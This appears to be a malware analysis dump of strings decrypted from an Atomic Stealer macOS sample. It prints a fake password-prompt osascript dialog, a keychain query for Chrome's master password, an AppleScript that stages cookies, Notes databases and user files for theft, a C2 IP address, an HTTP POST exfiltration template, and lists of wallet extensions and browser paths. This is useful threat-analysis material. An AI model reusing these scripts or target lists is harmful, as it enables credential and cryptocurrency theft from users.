atomic_stealer_decrypted_strings_4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa.txt
[*] Decrypted String at 0x10003DFCA with key 0x77: 5.42.65.114
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-sto
[*] Decrypted String at 0x10003D02A with key 0x11: .DS_Store
[*] Decrypted String at 0x10003D042 with key 0x11: Partitions
[*] Decrypted String at 0x10003D05A with key 0x38: Code Cache
[*] Decrypted String at 0x10003D072 with key 0xc5: dscl . authonly "
[*] Decrypted String at 0x10003D092 with key 0xc5: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for
[*] Decrypted String at 0x10003D0FA with key 0xea: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'
[*] Decrypted String at 0x10003D1BA with key 0x7e: /Cookies
[*] Decrypted String at 0x10003D1D2 with key 0x7e: /Network/Cookies
[*] Decrypted String at 0x10003D1F2 with key 0xa1: /Login Data
[*] Decrypted String at 0x10003D20A with key 0xa1: /Web Data
[*] Decrypted String at 0x10003D222 with key 0x3b: ibnejdfjmmkpcnlpebklmnkoeoihofec
[*] Decrypted String at 0x10003D252 with key 0x3b: nkbihfbeogaeaoehlefnkodbefgpgknn
[*] Decrypted String at 0x10003D282 with key 0x5c: bocpokimicclpaiekenaeelehdjllofo
[*] Decrypted String at 0x10003D2B2 with key 0x5c: nphplpgoakhhjchkkhmiggakijnkhfnd
[*] Decrypted String at 0x10003D2E2 with key 0x66: pocmplpaccanhmnllbbkpgfliimjljgo
[*] Decrypted String at 0x10003D312 with key 0x66: mfhbebgoclkghebffdldpobeajmbecfk
[*] Decrypted String at 0x10003D342 with key 0x95: fhilaheimglignddkjgofkcbgekhenbh
[*] Decrypted String at 0x10003D372 with key 0x95: hnhobjmcibchnmglfbldbfabcgaknlkj
[*] Decrypted String at 0x10003D3A2 with key 0xb: apnehcjmnengpnmccpaibjmhhoadaico
[*] Decrypted String at 0x10003D3D2 with key 0xb: cjmkndjhnagcfbpiemnkdpomccnjblmj
[*] Decrypted String at 0x10003D402 with key 0x38: cmndjbecilbocjfkibfbifhngkdmjgog
[*] Decrypted String at 0x10003D432 with key 0x38: pnndplcbkakcplkjnolgbkdgjikjednm
[*] Decrypted String at 0x10003D462 with key 0xb3: dhgnlgphgchebgoemcjekedjjbifijid
[*] Decrypted String at 0x10003D492 with key 0xb3: fhbohimaelbohpjbbldcngcnapndodjp
[*] Decrypted String at 0x10003D4C2 with key 0xde: ffnbelfdoeiohenkjibnmadjiehjhajb
[*] Decrypted String at 0x10003D4F2 with key 0xde: afbcbjpbpfadlkmhmclhkeeodmamcflc
[*] Decrypted String at 0x10003D522 with key 0x60: hnfanknocfeofbddgcijnmhnfnkdnaad
[*] Decrypted String at 0x10003D552 with key 0x60: hpglfhgfnhbgpjdenjgmdgoeiappafln
[*] Decrypted String at 0x10003D5B2 with key 0x89: kncchdigobghenbbaddojjnnaogfppfj
[*] Decrypted String at 0x10003D5E2 with key 0xfb: amkmjjmmflddogmhpjloimipbofnfjih
[*] Decrypted String at 0x10003D612 with key 0xfb: nlbmnnijcnlegkjjpcfjclmcfggfefdm
[*] Decrypted String at 0x10003D642 with key 0x33: ppdadbejkmjnefldpcdjhnkpbjkikoip
[*] Decrypted String at 0x10003D672 with key 0x33: fnjhmkhhmkbjkkabndcnnogagogbneec
[*] Decrypted String at 0x10003D6A2 with key 0x90: cphhlgmgameodnhkjdmkpanlelnlohao
[*] Decrypted String at 0x10003D6D2 with key 0x90: nhnkbkgjikgcigadomkphalanndcapjk
[*] Decrypted String at 0x10003D702 with key 0xc5: kpfopkelmapcoipemfendmdcghnegimn
[*] Decrypted String at 0x10003D732 with key 0xc5: copjnifcecdedocejpaapepagaodgpbh
[*] Decrypted String at 0x10003D762 with key 0x29: aiifbnbfobpmeekipheeijimdpnlpgpp
[*] Decrypted String at 0x10003D792 with key 0x29: dmkamcknogkgcdfhhbddcghachkejeap
[*] Decrypted String at 0x10003D7C2 with key 0x5c: cnmamaachppnkjgnildpdmkaakejnhae
[*] Decrypted String at 0x10003D7F2 with key 0x5c: jojhfeoedkpkglbfimdfabpdfjaoolaf
[*] Decrypted String at 0x10003D822 with key 0xc5: flpiciilemghbmfalicajoolhkkenfel
[*] Decrypted String at 0x10003D852 with key 0xc5: nknhiehlklippafakaeklbeglecifhad
[*] Decrypted String at 0x10003D882 with key 0xf6: hcflpincpppdclinealmandijcmnkbgn
[*] Decrypted String at 0x10003D8B2 with key 0xf6: ookjlbkiijinhpmnjffcofjonbfbgaoc
[*] Decrypted String at 0x10003D8E2 with key 0xd1: mnfifefkajgofkcjkemidiaecocnkjeh
[*] Decrypted String at 0x10003D912 with key 0xd1: hmeobnfnfcmdkdcmlblgagmfpfboieaf
[*] Decrypted String at 0x10003D942 with key 0x11: dkdedlpgdmmkkfjabffeganieamfklkm
[*] Decrypted String at 0x10003D972 with key 0x11: nlgbhdfgdhgbiamfdfmbikcdghidoadd
[*] Decrypted String at 0x10003D9A2 with key 0x56: cihmoadaighcejopammfbmddcmdekcje
[*] Decrypted String at 0x10003D9D2 with key 0x56: lodccjjbdhfakaekdiahmedfbieldgik
[*] Decrypted String at 0x10003DA32 with key 0x93: klnaejjgbibmhlephnhpmaofohgkpgkd
[*] Decrypted String at 0x10003DA62 with key 0xde: aeachknmefphepccionboohckonoeemg
[*] Decrypted String at 0x10003DA92 with key 0xde: fnnegphlobjdpkhecapkijjdkgcjhkib
[*] Decrypted String at 0x10003DAC2 with key 0x1a: pdadjkfkgcafgbceimcpbkalnfnepbnk
[*] Decrypted String at 0x10003DAF2 with key 0x1a: acmacodkjbdgmoleeebolmdjonilkdbch
[*] Decrypted String at 0x10003DB22 with key 0x6b: bfnaelmomeimhlpmgjnjophhpkkoljpa
[*] Decrypted String at 0x10003DB52 with key 0x6b: cgeeodpfagjceefieflmdfphplkenlfk
[*] Decrypted String at 0x10003DB82 with key 0xa4: imloifkgjagghnncjkhggdhalmcnfklk
[*] Decrypted String at 0x10003DBB2 with key 0xa4: aholpfdialjgjfhomihkjbmgjidlcdno
[*] Decrypted String at 0x10003DBE2 with key 0xe7: egjidjbpglichdcondbcbdnbeeppgdph
[*] Decrypted String at 0x10003DC12 with key 0xe7: efbglgofoippbgcjepnhiblaibcnclgk
[*] Decrypted String at 0x10003DC42 with key 0x2f: opcgpfmipidbgpenhmajoajpbobppdil
[*] Decrypted String at 0x10003DC72 with key 0x2f: hifafgmccdpekplomjjkcfgodnhcellj
[*] Decrypted String at 0x10003DCA2 with key 0x5c: ojggmchlghnjlapmfbnjholfjkiidbch
[*] Decrypted String at 0x10003DCD2 with key 0x5c: jnlgamecbpmbajjfhmmmlhejkemejdma
[*] Decrypted String at 0x10003DD02 with key 0xa1: dlcobpjiigpikoobohmabehhmhfoodbb
[*] Decrypted String at 0x10003DD32 with key 0xa1: ebfidpplhabeedpnhjnobghokpiioolj
[*] Decrypted String at 0x10003DD62 with key 0xd4: loinekcabhlmhjjbocijdoimmejangoa
[*] Decrypted String at 0x10003DD92 with key 0xd4: ejjladinnckdgjemekebdpeokbikhfci
[*] Decrypted String at 0x10003DDC2 with key 0x18: phkbamefinggmakgklpkljjmgibohnba
[*] Decrypted String at 0x10003DDF2 with key 0x18: ppbibelpcjmhbdihakflkdcoccbgbkpo
[*] Decrypted String at 0x10003DE22 with key 0x51: Chromium/
[*] Decrypted String at 0x10003DE3A with key 0x92: Snapshots
[*] Decrypted String at 0x10003DE52 with key 0x3e: /Local Extension Settings/
[*] Decrypted String at 0x10003DE7A with key 0x3e: /cookies.sqlite
[*] Decrypted String at 0x10003DE9A with key 0x8d: /formhistory.sqlite
[*] Decrypted String at 0x10003DEBA with key 0x8d: /key4.db
[*] Decrypted String at 0x10003DED2 with key 0xa2: /logins.json
[*] Decrypted String at 0x10003DEEA with key 0xef: security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'
[*] Decrypted String at 0x10003DF4A with key 0xef: masterpass-chrome
[*] Decrypted String at 0x10003DF6A with key 0xb: POST /p2p HTTP/1.1
Host:
[*] Decrypted String at 0x10003DF92 with key 0xb: :80
uuid:
[*] Decrypted String at 0x10003DFAA with key 0x56:
Content-Length:
[*] Decrypted String at 0x10003DFE2 with key 0x77: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:"
set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"}
set bankSize to 0
tell application "Finder"
set username to short user name of (system info)
try
[*] Decrypted String at 0x10003E0FA with key 0xc0: if not (exists folder destinationFolderPath) then
make new folder at (path to home folder) with properties {name:"fg"}
end if
set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
end try
set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
[*] Decrypted String at 0x10003E33A with key 0xc0: set notesFolder to folder notesFolderPath
set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder
repeat with aFile in notesFiles
set fileSize to size of aFile
if (bankSize + fileSize) 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + fileSize
end try
else
exit repeat
end if
end repeat
[*] Decrypted String at 0x10003E5CA with key 0xd4: end try
set desktopFiles to every file of desktop
set documentsFiles to every file of folder "Documents" of (path to home folder)
repeat with aFile in (desktopFiles & documentsFiles)
set fileExtension to name extension of aFile
if fileExtension is in extensionsList then
set fileSize to size of aFile
if (bankSize + fileSize) 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + fileSize
end try
else
exit repeat
end if
end if
end repeat
end try
end tell'
[*] Decrypted String at 0x10003E8EA with key 0x2c: FileGrabber/
[*] Decrypted String at 0x10003E902 with key 0x29: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
[*] Decrypted String at 0x10003E95A with key 0x7e: /Library/Application Support/
[*] Decrypted String at 0x10003E982 with key 0x7e: /Library/Cookies/Cookies.binarycookies
[*] Decrypted String at 0x10003E9BA with key 0x81: safari/saf1
[*] Decrypted String at 0x10003E9D2 with key 0x81: /.config/filezilla/recentservers.xml
[*] Decrypted String at 0x10003EA02 with key 0xd4: FileZilla/recentservers.xml
[*] Decrypted String at 0x10003EA2A with key 0xd4: Chrome
[*] Decrypted String at 0x10003EA42 with key 0xdd: Google/Chrome/
[*] Decrypted String at 0x10003EA62 with key 0x2f: BraveSoftware/Brave-Browser/
[*] Decrypted String at 0x10003EA8A with key 0xab: Microsoft Edge/
[*] Decrypted String at 0x10003EAAA with key 0xb: com.operasoftware.Opera/
[*] Decrypted String at 0x10003EAD2 with key 0xef: com.operasoftware.OperaGX/
[*] Decrypted String at 0x10003EAFA with key 0x4d: Vivaldi/
[*] Decrypted String at 0x10003EB12 with key 0x38: /Library/Application Support/
[*] Decrypted String at 0x10003EB3A with key 0x38: Firefox/Profiles/
[*] Decrypted String at 0x10003EB5A with key 0x93: /Library/Keychains/login.keychain-db
[*] Decrypted String at 0x10003EB8A with key 0x93: keychain
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-store.json
[*] Decrypted String at 0x10003EBCA with key 0x84: deskwallets/Binance/app-store.json
[*] Decrypted String at 0x10003EBFA with key 0xdd: deskwallets/Electrum/
[*] Decrypted String at 0x10003EC1A with key 0xdd: /.electrum/wallets/
[*] Decrypted String at 0x10003EC3A with key 0xc2: deskwallets/Coinomi/
[*] Decrypted String at 0x10003EC5A with key 0xc2: Coinomi/wallets/
[*] Decrypted String at 0x10003EC7A with key 0x2a: deskwallets/Exodus/
[*] Decrypted String at 0x10003EC9A with key 0xf6: deskwallets/Atomic/
[*] Decrypted String at 0x10003ECBA with key 0xf6: atomic/Local Storage/leveldb/
[*] Decrypted String at 0x10003ECE2 with key 0x5c: tell application
[*] Decrypted String at 0x10003ED02 with key 0x5c: "Terminal" to close first